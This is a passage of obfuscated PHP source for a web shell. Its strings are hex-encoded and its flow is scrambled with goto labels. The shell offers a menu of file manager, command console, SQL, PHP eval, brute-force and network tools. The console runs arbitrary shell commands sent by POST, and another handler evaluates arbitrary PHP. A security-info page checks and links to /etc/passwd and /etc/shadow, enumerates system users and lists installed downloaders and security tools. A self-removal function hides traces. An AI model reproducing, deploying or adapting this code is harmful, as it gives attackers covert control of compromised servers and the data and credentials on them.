"\x46\x69\x6c\145\163\115\141\x6e", "\103\x6f\156\x73\157\154\x65" => "\x43\x6f\x6e\163\x6f\x6c\x65", "\123\161\x6c" => "\123\x71\x6c", "\x50\x68\x70" => "\120\x68\x70", "\x53\164\x72\x69\156\147\x20\x74\x6f\x6f\x6c\163" => "\123\164\x72\x69\156\147\x54\x6f\x6f\x6c\x73", "\102\162\x75\164\x65\x66\157\x72\x63\x65" => "\x42\x72\x75\164\x65\x66\157\x72\x63\145", "\x4e\x65\x74\x77\157\162\x6b" => "\116\145\164\167\x6f\x72\153"); if (!empty($GLOBALS["\141\x75\164\150\137\x70\x61\x73\163"])) { $m["\114\x6f\x67\157\165\164"] = "\x4c\x6f\x67\x6f\165\164"; } $m["\x53\x65\154\146\x20\x72\145\155\157\x76\145"] = "\123\x65\x6c\146\x52\145\x6d\157\166\x65"; $menu = ''; foreach ($m as $k => $v) { $menu .= "\74\x74\150\40\x77\151\144\x74\x68\x3d\x22" . (int) (100 / count($m)) . "\45\42\76\x5b\40\x3c\x61\40\150\x72\145\146\x3d\x22\43\42\x20\x6f\x6e\x63\x6c\x69\x63\x6b\75\42\x67\50\x27" . $v . "\x27\x2c\156\165\x6c\154\54\x27\x27\x2c\x27\x27\x2c\47\47\x29\x22\76" . $k . "\x3c\x2f\141\x3e\x20\135\74\x2f\164\x68\x3e"; } $drives = ''; if ($GLOBALS["\x6f\163"] == "\x77\151\x6e") { foreach (range("\x63", "\x7a") as $drive) { if (is_dir($drive . "\72\134")) { $drives .= "\x20\x3c\141\x20\150\x72\145\146\x3d\42\x23\x22\40\157\156\x63\154\x69\x63\x6b\x3d\x22\x67\50\x27\x46\x69\x6c\145\163\115\x61\x6e\x27\54\x27" . $drive . "\72\x2f\x27\x29\42\x20\76\40\x5b" . $drive . "\135\x20\74\x2f\x61\x3e\40"; } } } echo "\x20\74\164\x61\142\154\x65\x20\143\154\x61\163\x73\75\x69\156\146\157\40\x63\x65\x6c\x6c\x70\x61\144\x64\x69\156\147\75\63\x20\x63\145\x6c\154\163\160\x61\143\x69\156\x67\x3d\x30\40\x77\x69\144\x74\x68\75\61\60\60\x25\x20\76\40\x3c\x74\x72\x3e\x20\74\164\144\40\x77\151\x64\164\x68\75\x31\x3e\40\x3c\x73\160\x61\x6e\76\40\x55\156\x61\x6d\x65\72\40\x3c\142\x72\76\40\125\x73\145\162\x3a\x20\x3c\x62\162\76\x20\x50\150\x70\x3a\x20\x3c\142\162\76\x20\x48\x64\x64\72\40\x3c\142\162\76\x20\103\x77\144\x3a" . ($GLOBALS["\157\x73"] == "\x77\151\156" ? "\x20\74\142\x72\x3e\40\x44\x72\151\166\x65\163\x3a" : '') . "\40\74\57\163\160\x61\x6e\76\40\74\57\x74\x64\x3e\x20" . "\40\74\164\x64\x3e\40\x3c\x6e\x6f\142\x72\x3e\x20" . substr(@php_uname(), 0, 120) . "\x20\74\57\x6e\x6f\x62\162\x3e\x20\74\x62\162\x3e\x20" . $uid . "\50" . $user . "\51\x20\x3c\163\160\141\156\x3e\x20\107\162\157\x75\x70\x3a\x20\74\x2f\x73\x70\141\x6e\x3e\40" . $gid . "\50" . $group . "\51\x20\74\142\162\76\40" . @phpversion() . "\40\74\x73\x70\141\156\76\40\x53\141\x66\x65\155\x6f\x64\x65\x3a\40\x3c\x2f\x73\x70\x61\x6e\76\x20" . ($GLOBALS["\x73\141\146\x65\137\x6d\x6f\144\x65"] ? "\40\74\x66\x6f\x6e\x74\x20\x63\157\154\x6f\162\75\162\145\144\x20\x3e\40\117\116\x20\74\57\x66\157\x6e\x74\x3e\x20" : "\x20\x3c\x66\157\156\164\40\143\x6f\154\157\162\x3d\x67\162\x65\145\156\76\x20\x3c\142\x3e\x20\117\x46\x46\40\x3c\57\x62\76\40\74\57\146\x6f\156\164\x3e\40") . "\x20\x3c\x61\x20\150\x72\145\x66\75\43\x20\157\x6e\x63\154\151\143\153\x3d\42\147\50\x27\120\150\x70\x27\x2c\156\x75\x6c\x6c\54\x27\47\x2c\x27\x69\x6e\x66\x6f\47\51\42\76\133\x20\160\x68\x70\x69\156\146\157\40\135\74\57\x61\76\x20\x3c\163\160\x61\x6e\76\x44\x61\x74\x65\164\x69\155\x65\72\74\x2f\163\x70\x61\156\76\40" . date("\x59\55\x6d\x2d\x64\x20\110\72\x69\x3a\x73") . "\74\142\162\76" . beer_ViewSize($totalSpace) . "\40\74\x73\x70\141\x6e\76\x46\162\145\x65\x3a\74\57\163\160\141\x6e\76\x20" . beer_ViewSize($freeSpace) . "\40\50" . (int) ($freeSpace / $totalSpace * 100) . "\45\x29\74\142\162\x3e" . $cwd_links . "\x20" . beer_PermsColor($GLOBALS["\x63\167\144"]) . "\40\x3c\141\40\x68\x72\x65\146\75\43\40\157\x6e\143\154\151\x63\153\x3d\42\147\x28\x27\106\151\154\145\163\x4d\141\x6e\47\54\47" . $GLOBALS["\x68\x6f\x6d\145\x5f\x63\x77\144"] . "\x27\54\x27\47\x2c\x27\x27\54\47\47\x29\42\x3e\133\x20\150\157\155\145\40\x5d\x3c\57\x61\x3e\74\142\162\76" . $drives . "\x3c\x2f\x74\144\x3e" . "\x3c\164\x64\40\x77\151\144\x74\x68\x3d\61\x20\141\154\x69\x67\156\75\162\x69\x67\150\x74\76\74\x6e\x6f\142\162\x3e\x3c\163\145\x6c\x65\143\x74\40\157\x6e\x63\150\141\x6e\x67\145\75\x22\x67\50\x6e\165\154\x6c\54\x6e\x75\x6c\154\54\x6e\x75\x6c\154\x2c\x6e\165\154\154\54\x6e\165\154\154\x2c\164\150\x69\163\x2e\x76\141\154\165\145\x29\42\76\74\x6f\160\164\x67\162\x6f\165\160\x20\x6c\141\x62\145\x6c\75\x22\120\x61\x67\x65\x20\x63\x73\x65\x74\x22\x3e" . $opt_csets . "\x3c\x2f\157\160\x74\x67\x72\x6f\x75\160\x3e\74\57\x73\145\154\x65\x63\164\x3e\x3c\142\x72\76\74\x73\160\x61\156\76\x53\145\x72\166\145\x72\x20\x49\x50\x3a\74\57\163\x70\141\156\76\74\142\162\x3e" . @$_SERVER["\x53\x45\x52\126\x45\x52\x5f\x41\x44\104\122"] . "\x3c\142\x72\x3e\x3c\163\x70\141\x6e\x3e\x43\x6c\x69\145\x6e\x74\40\x49\x50\72\74\57\163\x70\x61\156\76\74\x62\x72\76" . $_SERVER["\122\x45\x4d\117\124\x45\x5f\x41\104\104\122"] . "\74\57\156\157\142\162\76\x3c\x2f\164\144\x3e\x3c\x2f\164\x72\x3e\x3c\57\164\x61\x62\154\145\x3e" . "\x3c\164\141\142\x6c\145\40\x73\164\171\x6c\x65\75\x22\142\x6f\162\144\145\162\55\x74\x6f\x70\72\62\160\170\x20\163\157\154\x69\144\40\43\63\x33\x33\73\x22\x20\x63\145\x6c\154\x70\x61\144\x64\151\x6e\x67\75\x33\x20\143\145\154\x6c\163\160\x61\143\151\x6e\147\75\x30\x20\x77\151\x64\x74\150\75\61\60\60\x25\x3e\x3c\x74\162\x3e" . $menu . "\74\57\x74\x72\x3e\x3c\57\164\x61\142\154\x65\x3e\74\144\151\x76\x20\x73\164\171\154\x65\x3d\x22\x6d\141\x72\147\151\x6e\72\65\42\76"; } goto qARST; JZcSZ: function actionSecInfo() { beer_Header(); echo "\x3c\x68\61\76\123\x65\x72\166\145\162\x20\163\x65\x63\x20\151\x6e\x66\x6f\162\155\x61\164\151\157\x6e\74\57\x68\x31\76\x3c\144\x69\166\x20\x63\154\141\163\x73\75\143\157\x6e\x74\x65\x6e\164\x3e"; function beer_SecParam($n, $v) { $v = trim($v); if ($v) { echo "\74\163\x70\x61\156\76" . $n . "\x3a\40\x3c\x2f\163\x70\141\x6e\x3e"; if (strpos($v, "\xa") === false) { echo $v . "\74\142\x72\x3e"; } else { echo "\74\x70\x72\x65\40\x63\154\141\163\163\x3d\155\154\61\x3e" . $v . "\74\57\160\x72\x65\76"; } } } beer_SecParam("\x53\x65\162\166\x65\x72\40\x73\x6f\x66\x74\167\141\162\145", @getenv("\123\x45\x52\126\105\x52\x5f\x53\117\106\124\127\101\x52\x45")); if (function_exists("\141\160\141\143\x68\145\x5f\147\145\x74\x5f\155\157\144\x75\154\145\163")) { beer_SecParam("\114\157\x61\x64\x65\144\40\x41\160\141\x63\x68\x65\x20\x6d\157\144\165\x6c\x65\x73", implode("\x2c\x20", apache_get_modules())); } beer_SecParam("\104\151\163\x61\142\x6c\145\x64\x20\x50\x48\120\x20\x46\x75\x6e\143\164\151\157\156\x73", $GLOBALS["\x64\151\163\141\x62\154\x65\137\146\x75\x6e\143\164\151\157\x6e\x73"] ? $GLOBALS["\144\151\163\x61\142\x6c\145\137\x66\x75\156\x63\x74\x69\157\x6e\x73"] : "\x6e\157\156\145"); beer_SecParam("\117\160\x65\x6e\40\142\141\x73\x65\x20\x64\151\162", @ini_get("\157\x70\145\x6e\137\x62\141\x73\145\144\151\x72")); beer_SecParam("\x53\x61\x66\145\x20\155\157\x64\145\40\145\x78\145\143\40\x64\151\162", @ini_get("\163\141\x66\x65\137\x6d\157\144\145\x5f\145\170\145\x63\x5f\144\x69\x72")); beer_SecParam("\x53\141\146\x65\40\155\157\x64\145\x20\x69\156\143\x6c\165\x64\145\x20\x64\151\162", @ini_get("\163\x61\x66\145\137\x6d\157\x64\x65\x5f\151\156\143\154\165\144\145\x5f\x64\151\162")); beer_SecParam("\143\125\x52\114\40\x73\x75\x70\x70\x6f\162\x74", function_exists("\x63\165\162\x6c\137\x76\145\x72\x73\151\157\x6e") ? "\x65\x6e\141\142\x6c\145\144" : "\156\157"); $temp = array(); if (function_exists("\155\x79\163\161\x6c\x5f\x67\145\x74\x5f\143\154\151\x65\156\164\137\151\156\x66\x6f")) { $temp[] = "\x4d\171\123\161\x6c\40\50" . mysql_get_client_info() . "\51"; } if (function_exists("\x6d\163\163\x71\x6c\x5f\x63\157\x6e\156\145\x63\164")) { $temp[] = "\x4d\x53\x53\x51\114"; } if (function_exists("\x70\147\x5f\x63\x6f\156\156\145\x63\x74")) { $temp[] = "\120\x6f\x73\164\x67\x72\145\123\121\114"; } if (function_exists("\x6f\x63\x69\137\x63\157\156\x6e\145\x63\x74")) { $temp[] = "\117\x72\141\143\154\x65"; } beer_SecParam("\x53\165\x70\160\157\x72\164\145\x64\x20\x64\x61\164\141\142\141\163\x65\163", implode("\54\40", $temp)); echo "\74\142\x72\76"; if ($GLOBALS["\x6f\163"] == "\156\x69\170") { beer_SecParam("\x52\145\141\144\141\x62\154\x65\x20\57\145\164\143\x2f\160\141\163\163\x77\x64", @is_readable("\57\145\x74\x63\57\160\x61\x73\163\167\144") ? "\171\x65\163\x20\x3c\141\40\x68\x72\145\x66\x3d\x27\x23\47\40\157\x6e\x63\x6c\151\143\153\75\47\x67\x28\x22\x46\x69\x6c\x65\163\x54\157\157\154\163\x22\54\40\x22\57\145\x74\x63\x2f\x22\54\x20\x22\x70\141\x73\163\x77\144\42\x29\47\x3e\x5b\x76\x69\145\x77\135\74\57\141\x3e" : "\156\157"); beer_SecParam("\x52\x65\141\144\x61\x62\154\145\40\x2f\x65\164\x63\x2f\163\x68\141\x64\x6f\x77", @is_readable("\57\x65\164\x63\x2f\x73\x68\x61\144\x6f\x77") ? "\171\145\163\x20\74\x61\x20\150\162\145\146\75\x27\43\x27\x20\x6f\156\x63\x6c\x69\x63\x6b\x3d\47\x67\50\x22\106\x69\154\x65\x73\124\x6f\157\x6c\x73\42\x2c\40\x22\57\145\x74\143\57\42\x2c\40\42\x73\x68\141\144\157\167\42\x29\x27\76\133\x76\x69\x65\167\x5d\74\x2f\141\76" : "\x6e\157"); beer_SecParam("\x4f\x53\x20\x76\x65\x72\x73\151\157\156", @file_get_contents("\x2f\x70\162\157\143\x2f\x76\x65\162\163\x69\x6f\156")); beer_SecParam("\104\x69\x73\x74\x72\40\156\x61\x6d\x65", @file_get_contents("\x2f\x65\x74\x63\57\x69\163\163\165\x65\x2e\x6e\x65\x74")); if (!$GLOBALS["\163\x61\x66\145\x5f\155\x6f\x64\x65"]) { $userful = array("\147\x63\x63", "\x6c\x63\x63", "\x63\x63", "\154\x64", "\155\x61\x6b\x65", "\x70\x68\x70", "\x70\x65\162\154", "\x70\x79\164\150\157\x6e", "\162\165\x62\x79", "\x74\x61\162", "\x67\172\151\160", "\x62\172\x69\x70", "\142\x7a\151\x77\141\164", "\x6e\x63", "\154\x6f\143\141\x74\145", "\163\165\x69\x64\160\x65\162\154"); $danger = array("\153\141\166", "\x6e\x6f\x64\x33\62", "\x62\144\x63\157\x72\x65\144", "\165\x76\x73\143\141\x6e", "\163\141\x76", "\x64\162\x77\x65\x62\x64", "\143\x6c\x61\155\144", "\162\153\150\x75\x6e\x74\145\x72", "\x63\150\x6b\162\157\x6f\x74\x6b\x69\x74", "\151\x70\x74\x61\x62\x6c\145\x73", "\x69\160\x66\167", "\x74\162\x69\160\167\151\x72\x65", "\x73\150\x69\145\x6c\144\x63\143", "\160\157\x72\x74\163\145\156\164\x72\171", "\163\156\157\162\x74", "\x6f\x73\163\145\x63", "\x6c\x69\144\x73\141\144\155", "\x74\x63\160\x6c\x6f\144\147", "\163\170\x69\144", "\154\157\147\143\x68\x65\x63\153", "\x6c\157\x67\x77\x61\164\143\x68", "\x73\171\163\x6d\x61\x73\153", "\172\155\x62\163\143\x61\x70", "\x73\x61\x77\155\x69\154\x6c", "\167\157\162\155\x73\143\x61\x6e", "\156\151\x6e\152\141"); $downloaders = array("\167\x67\145\164", "\x66\x65\x74\143\x68", "\x6c\x79\156\x78", "\x6c\151\x6e\x6b\x73", "\x63\x75\162\154", "\x67\145\164", "\154\167\x70\55\155\151\x72\x72\157\162"); echo "\74\142\162\x3e"; $temp = array(); foreach ($userful as $item) { if (beer_Which($item)) { $temp[] = $item; } } beer_SecParam("\125\163\145\x72\x66\x75\x6c", implode("\x2c\x20", $temp)); $temp = array(); foreach ($danger as $item) { if (beer_Which($item)) { $temp[] = $item; } } beer_SecParam("\104\x61\156\147\145\x72", implode("\x2c\40", $temp)); $temp = array(); foreach ($downloaders as $item) { if (beer_Which($item)) { $temp[] = $item; } } beer_SecParam("\x44\x6f\167\x6e\154\x6f\141\x64\145\x72\163", implode("\54\x20", $temp)); echo "\74\x62\x72\57\76"; beer_SecParam("\x48\104\x44\x20\x73\x70\141\x63\145", beer_Ex("\x64\x66\x20\x2d\150")); beer_SecParam("\x48\157\x73\164\163", @file_get_contents("\x2f\x65\164\x63\x2f\150\157\163\x74\x73")); echo "\74\x62\162\57\76\74\163\x70\x61\156\76\160\x6f\x73\151\170\137\147\145\x74\x70\x77\x75\x69\144\x20\50\42\122\145\x61\x64\42\x20\57\x65\164\x63\57\x70\x61\163\163\167\144\x29\x3c\x2f\x73\x70\141\x6e\x3e\x3c\164\x61\142\x6c\145\x3e\74\x66\157\x72\155\40\x6f\156\163\x75\x62\155\151\164\75\47\147\x28\x6e\165\x6c\154\x2c\x6e\165\x6c\x6c\54\42\x35\x22\54\x74\x68\151\163\x2e\160\x61\x72\x61\x6d\61\56\x76\141\x6c\165\145\54\164\x68\x69\163\x2e\x70\x61\x72\x61\155\x32\x2e\x76\x61\154\x75\145\x29\x3b\x72\145\164\x75\x72\156\x20\146\141\154\x73\145\73\47\76\x3c\x74\x72\x3e\74\164\144\x3e\106\162\157\x6d\x3c\57\x74\x64\x3e\x3c\x74\x64\76\x3c\151\156\160\x75\164\40\x74\171\160\145\x3d\x74\145\170\x74\x20\x6e\141\155\145\75\x70\x61\162\x61\x6d\x31\x20\x76\x61\x6c\165\x65\x3d\x30\x3e\x3c\57\x74\144\x3e\x3c\57\164\x72\x3e\74\x74\162\76\74\x74\144\76\x54\x6f\74\x2f\164\144\76\x3c\x74\144\x3e\74\x69\156\x70\x75\164\40\164\171\160\x65\75\x74\x65\170\164\40\x6e\141\155\x65\x3d\160\141\162\141\155\62\x20\166\141\x6c\165\x65\x3d\x31\x30\60\x30\76\74\x2f\164\x64\76\x3c\x2f\x74\x72\x3e\x3c\x2f\x74\141\x62\x6c\x65\76\74\x69\156\x70\165\x74\40\x74\x79\x70\x65\x3d\x73\165\142\x6d\x69\x74\40\166\141\154\165\x65\75\42\x3e\76\42\76\74\x2f\x66\157\162\155\76"; if (isset($_POST["\167\x61\164"], $_POST["\x78\x61\x74"]) && is_numeric($_POST["\167\141\x74"]) && is_numeric($_POST["\170\x61\x74"])) { $temp = ''; for (; $_POST["\x77\141\x74"] <= $_POST["\170\141\164"]; $_POST["\x77\x61\x74"]++) { $uid = @posix_getpwuid($_POST["\x77\x61\164"]); if ($uid) { $temp .= join("\72", $uid) . "\12"; } } echo "\x3c\142\162\57\x3e"; beer_SecParam("\x55\x73\145\162\x73", $temp); } } } else { beer_SecParam("\117\x53\40\126\145\162\163\151\x6f\156", beer_Ex("\166\x65\162")); beer_SecParam("\x41\143\x63\157\x75\156\164\40\123\145\164\x74\x69\156\147\x73", beer_Ex("\x6e\x65\x74\x20\x61\143\x63\x6f\x75\x6e\164\x73")); beer_SecParam("\x55\x73\145\x72\x20\x41\x63\143\157\x75\x6e\x74\x73", beer_Ex("\156\x65\164\x20\x75\x73\x65\162")); } echo "\74\x2f\144\151\x76\x3e"; beer_Footer(); } goto w9Sjf; kXAlX: $cwd = @getcwd(); goto BIykg; fxZTh: if (!function_exists("\160\x6f\x73\x69\x78\137\147\x65\x74\147\162\147\x69\x64") && strpos($GLOBALS["\144\x69\x73\x61\x62\154\x65\x5f\x66\165\x6e\x63\164\151\x6f\156\x73"], "\160\157\163\x69\x78\137\x67\145\x74\147\x72\x67\151\144") === false) { function posix_getgrgid($p) { return false; } } goto CijWD; l3t5R: function actionLogout() { setcookie(md5($_SERVER["\110\124\x54\120\x5f\110\x4f\123\124"]), '', time() - 3600); die("\x65\x78\151\164"); } goto zhFXO; zhFXO: function actionSelfRemove() { if ($_POST["\x76\x61\x74"] == "\x79\x65\163") { if (@unlink(preg_replace("\41\x5c\x28\134\144\53\134\51\134\x73\56\x2a\x21", '', __FILE__))) { die("\106\151\154\145\40\150\141\163\40\x62\x65\145\x6e\x20\162\x65\x6d\157\166\145\144"); } else { echo "\165\156\x6c\151\x6e\153\40\145\162\x72\x6f\162\41"; } } if ($_POST["\166\141\x74"] != "\171\x65\x73") { beer_Header(); } echo "\74\x68\x31\x3e\x52\x65\155\x6f\x76\145\74\x2f\150\x31\x3e\x3c\144\x69\166\x20\143\x6c\141\x73\x73\75\143\x6f\156\164\x65\x6e\164\76\x52\x65\141\154\x6c\x79\40\x77\141\156\164\x20\x74\157\40\162\145\155\x6f\x76\x65\77\74\x62\x72\x3e\74\x61\40\x68\162\x65\x66\75\43\x20\157\156\143\x6c\151\x63\x6b\75\42\147\50\156\x75\154\154\54\156\x75\x6c\x6c\x2c\47\x79\145\x73\47\x29\x22\x3e\x59\145\x73\x3c\x2f\x61\76\x3c\57\144\151\x76\x3e"; beer_Footer(); } goto ji6I0; igmz6: function beer_ViewSize($s) { if (is_int($s)) { $s = sprintf("\45\x75", $s); } if ($s >= 1073741824) { return sprintf("\45\x31\56\x32\146", $s / 1073741824) . "\x20\107\x42"; } elseif ($s >= 1048576) { return sprintf("\x25\61\56\x32\x66", $s / 1048576) . "\40\115\x42"; } elseif ($s >= 1024) { return sprintf("\x25\x31\56\x32\x66", $s / 1024) . "\40\x4b\102"; } else { return $s . "\40\102"; } } goto JVcoR; nkYjX: error_reporting(0); goto XyCKj; Dzyeb: function beer_Scandir($dir) { if (function_exists("\163\x63\x61\156\x64\151\162")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } goto nxiKR; iACqi: function actionRC() { if (!@$_POST["\x76\141\x74"]) { $a = array("\x75\x6e\x61\x6d\x65" => php_uname(), "\160\x68\x70\x5f\166\x65\162\163\x69\x6f\x6e" => phpversion(), "\x73\x61\x66\x65\x6d\157\144\145" => @ini_get("\x73\141\146\x65\137\x6d\x6f\144\145")); echo serialize($a); } else { eval($_POST["\x76\141\164"]); } } goto Xqmnf; nxiKR: function beer_Which($p) { $path = beer_Ex("\167\150\x69\x63\150\x20" . $p); if (!empty($path)) { return $path; } return false; } goto JZcSZ; Kk9z5: if (get_magic_quotes_gpc()) { function BEER_stripslashes($array) { return is_array($array) ? array_map("\x42\105\x45\122\137\163\x74\162\x69\x70\163\x6c\141\x73\x68\145\163", $array) : stripslashes($array); } $_POST = BEER_stripslashes($_POST); $_COOKIE = BEER_stripslashes($_COOKIE); } goto q0oxq; EEA0l: if (!function_exists("\160\x6f\x73\151\170\137\147\145\164\x70\167\x75\151\x64") && strpos($GLOBALS["\144\x69\x73\141\x62\x6c\x65\x5f\146\165\156\143\x74\x69\x6f\156\163"], "\160\157\x73\151\x78\x5f\x67\x65\x74\x70\x77\x75\x69\144") === false) { function posix_getpwuid($p) { return false; } } goto fxZTh; OepEn: @ini_set("\146\x69\154\x65\137\165\160\154\x6f\141\144\163", 1); goto Bl3SU; vPQjc: function actionConsole() { if (!empty($_POST["\166\x61\x74"]) && !empty($_POST["\x77\141\x74"])) { BEER_setcookie(md5($_SERVER["\x48\x54\x54\120\x5f\110\117\123\x54"]) . "\x73\164\144\x65\162\x72\x5f\164\x6f\137\x6f\x75\x74", true); $_POST["\x76\141\x74"] .= "\40\x32\76\x26\61"; } elseif (!empty($_POST["\x76\141\x74"])) { BEER_setcookie(md5($_SERVER["\x48\x54\124\x50\x5f\x48\117\123\124"]) . "\x73\x74\x64\x65\162\x72\137\164\x6f\x5f\x6f\x75\164", 0); } if (isset($_POST["\141\x6a\x61\x78"])) { BEER_setcookie(md5($_SERVER["\110\124\x54\x50\137\110\117\123\124"]) . "\141\152\141\x78", true); ob_start(); echo "\144\56\x63\x66\x2e\143\155\x64\x2e\x76\141\x6c\165\x65\75\x27\x27\73\xa"; $temp = @iconv($_POST["\x63\163\145\164"], "\x55\x54\x46\55\70", addcslashes("\xa\x24\40" . $_POST["\x76\x61\164"] . "\xa" . beer_Ex($_POST["\x76\x61\x74"]), "\12\xa\x9\134\x27\40")); if (preg_match("\x21\x2e\x2a\143\x64\134\163\53\50\133\x5e\73\x5d\53\x29\x24\41", $_POST["\x76\141\164"], $match)) { if (@chdir($match[1])) { $GLOBALS["\143\167\x64"] = @getcwd(); echo "\143\x5f\x3d\x27" . $GLOBALS["\143\x77\x64"] . "\47\x3b"; } } echo "\x64\x2e\143\146\x2e\x6f\x75\x74\160\165\x74\56\x76\x61\154\165\145\53\x3d\x27" . $temp . "\x27\x3b"; echo "\144\x2e\143\x66\56\x6f\x75\x74\x70\x75\164\56\163\143\162\157\x6c\154\124\157\160\40\x3d\40\x64\x2e\x63\146\x2e\157\165\164\x70\x75\x74\x2e\163\x63\162\157\x6c\x6c\x48\x65\151\147\x68\x74\x3b"; $temp = ob_get_clean(); echo strlen($temp), "\xa", $temp; die; } if (empty($_POST["\141\152\141\x78"]) && !empty($_POST["\x76\141\164"])) { BEER_setcookie(md5($_SERVER["\110\x54\x54\120\137\110\x4f\123\x54"]) . "\x61\x6a\x61\x78", 0); } beer_Header(); echo "\74\x73\143\x72\x69\x70\164\x3e\xa\151\146\50\x77\x69\x6e\x64\x6f\167\56\105\x76\x65\156\x74\x29\x20\x77\151\156\x64\x6f\x77\56\143\141\160\164\165\x72\x65\x45\x76\145\x6e\164\163\50\x45\x76\x65\x6e\x74\x2e\113\105\131\104\117\x57\116\51\73\xa\x76\141\162\x20\143\155\x64\163\40\75\x20\156\145\167\x20\101\162\162\x61\171\50\47\47\x29\73\xa\x76\x61\x72\x20\143\165\x72\40\x3d\x20\60\x3b\xa\x66\165\x6e\x63\x74\151\157\x6e\40\153\160\50\x65\x29\40\x7b\xa\11\x76\141\x72\x20\156\40\x3d\40\x28\167\x69\156\144\157\167\x2e\105\166\145\156\164\x29\x20\x3f\40\x65\56\167\x68\x69\143\x68\x20\72\40\145\x2e\153\x65\171\x43\157\144\145\73\xa\x9\x69\x66\x28\x6e\40\x3d\75\40\x33\70\x29\x20\x7b\12\x9\11\x63\x75\x72\55\55\x3b\12\x9\11\x69\x66\50\143\x75\162\76\x3d\60\x29\xa\11\x9\11\x64\x6f\143\x75\x6d\145\156\x74\x2e\x63\146\56\143\155\144\x2e\x76\x61\154\165\x65\x20\75\x20\x63\155\144\163\133\143\165\x72\135\x3b\xa\11\11\x65\x6c\163\145\12\11\x9\x9\143\165\x72\x2b\x2b\x3b\xa\x9\175\x20\x65\x6c\x73\145\x20\151\146\50\156\40\x3d\75\40\x34\60\51\40\x7b\12\x9\x9\x63\165\x72\53\53\x3b\12\11\x9\x69\x66\50\143\x75\162\x20\x3c\40\143\x6d\144\163\x2e\x6c\145\156\147\164\x68\51\12\x9\x9\x9\144\157\143\165\155\x65\156\x74\56\x63\x66\x2e\x63\155\x64\x2e\x76\141\154\x75\x65\x20\75\40\143\x6d\144\x73\x5b\143\165\162\135\x3b\12\11\11\145\154\x73\x65\12\x9\x9\x9\143\165\x72\55\x2d\73\xa\11\x7d\12\x7d\xa\146\165\x6e\x63\164\151\157\x6e\x20\141\x64\x64\x28\x63\x6d\x64\x29\x20\173\xa\11\x63\155\x64\x73\x2e\x70\x6f\x70\x28\51\x3b\xa\11\143\155\x64\163\56\x70\x75\x73\x68\x28\x63\155\x64\x29\x3b\12\11\143\x6d\144\163\x2e\x70\165\x73\x68\x28\x27\47\x29\73\xa\11\143\x75\162\x20\75\40\x63\x6d\144\x73\x2e\154\x65\x6e\x67\164\150\55\x31\73\xa\175\12\74\x2f\x73\143\162\x69\x70\x74\x3e"; echo "\x3c\x68\61\76\103\157\x6e\x73\x6f\154\145\x3c\57\150\x31\x3e\74\x64\x69\x76\x20\x63\x6c\141\x73\163\75\x63\157\x6e\x74\145\156\x74\x3e\74\146\157\162\x6d\40\156\x61\x6d\x65\75\143\x66\x20\x6f\156\163\165\x62\x6d\x69\164\75\42\x69\x66\50\x64\x2e\143\x66\x2e\x63\x6d\x64\x2e\x76\141\x6c\x75\145\x3d\x3d\x27\143\x6c\x65\141\162\x27\x29\173\144\x2e\x63\146\56\157\x75\164\160\165\164\56\x76\141\154\165\x65\x3d\x27\x27\73\x64\56\143\146\56\x63\x6d\x64\x2e\x76\141\154\x75\145\x3d\x27\x27\x3b\x72\145\x74\165\x72\156\40\146\x61\x6c\163\x65\73\175\141\144\x64\x28\164\x68\151\163\x2e\x63\155\x64\56\166\x61\x6c\165\x65\51\73\151\x66\50\164\x68\x69\163\x2e\141\152\x61\170\x2e\143\x68\x65\x63\153\145\x64\x29\x7b\x61\50\x6e\x75\x6c\x6c\x2c\156\x75\x6c\x6c\54\x74\x68\151\x73\56\x63\x6d\x64\x2e\166\x61\154\x75\x65\54\164\x68\x69\x73\56\163\x68\157\x77\137\x65\x72\x72\157\x72\163\56\x63\x68\x65\143\153\145\x64\77\61\x3a\x27\x27\x29\x3b\x7d\x65\x6c\x73\x65\173\147\x28\x6e\x75\154\154\54\156\x75\x6c\154\54\164\150\x69\163\x2e\x63\155\x64\56\166\x61\x6c\x75\x65\54\164\150\151\163\56\163\x68\x6f\x77\x5f\145\x72\x72\x6f\162\163\56\x63\x68\x65\143\x6b\x65\144\x3f\x31\x3a\x27\x27\51\73\175\40\x72\145\x74\165\x72\156\x20\x66\x61\x6c\x73\x65\x3b\42\x3e\74\163\x65\154\145\143\x74\x20\156\x61\x6d\145\x3d\141\x6c\x69\141\x73\x3e"; foreach ($GLOBALS["\141\x6c\151\141\163\145\163"] as $n => $v) { if ($v == '') { echo "\x3c\157\x70\x74\147\162\157\165\x70\40\154\141\x62\145\x6c\75\x22\x2d" . htmlspecialchars($n) . "\55\42\76\74\x2f\x6f\x70\x74\x67\x72\157\x75\x70\x3e"; continue; } echo "\74\x6f\160\164\x69\157\x6e\x20\166\141\x6c\x75\145\x3d\x22" . htmlspecialchars($v) . "\42\x3e" . $n . "\74\x2f\x6f\x70\x74\151\x6f\156\x3e"; } echo "\74\57\x73\145\x6c\145\x63\x74\76\x3c\151\156\160\165\164\x20\164\171\x70\x65\x3d\142\x75\x74\x74\x6f\156\40\157\x6e\143\x6c\151\143\153\75\x22\141\144\144\x28\x64\56\143\x66\x2e\141\154\151\141\x73\56\166\141\154\165\145\x29\73\151\146\x28\x64\x2e\143\x66\56\141\152\x61\x78\x2e\x63\x68\145\x63\153\145\x64\51\173\x61\x28\x6e\165\x6c\154\x2c\156\165\x6c\x6c\x2c\x64\x2e\143\x66\56\x61\154\x69\141\163\56\166\141\154\x75\x65\54\x64\x2e\143\146\x2e\163\150\x6f\167\137\x65\x72\x72\157\x72\163\56\x63\x68\x65\143\x6b\x65\144\77\61\72\47\x27\51\73\x7d\145\154\x73\145\x7b\x67\x28\156\x75\154\154\54\156\x75\x6c\154\54\x64\56\x63\146\x2e\141\154\151\141\x73\56\166\x61\x6c\165\145\x2c\x64\x2e\143\146\x2e\x73\x68\x6f\x77\x5f\x65\162\x72\157\x72\x73\56\x63\150\145\143\153\x65\144\77\x31\x3a\x27\47\51\x3b\x7d\x22\40\x76\141\154\x75\145\x3d\x22\76\x3e\42\76\40\x3c\156\x6f\x62\x72\x3e\74\151\156\x70\165\x74\40\164\x79\x70\x65\x3d\x63\x68\x65\143\x6b\142\157\x78\x20\x6e\141\x6d\x65\x3d\141\152\141\x78\x20\x76\x61\154\165\x65\x3d\61\40" . (@$_COOKIE[md5($_SERVER["\x48\124\124\120\x5f\x48\x4f\x53\124"]) . "\141\152\x61\170"] ? "\143\150\x65\143\153\x65\144" : '') . 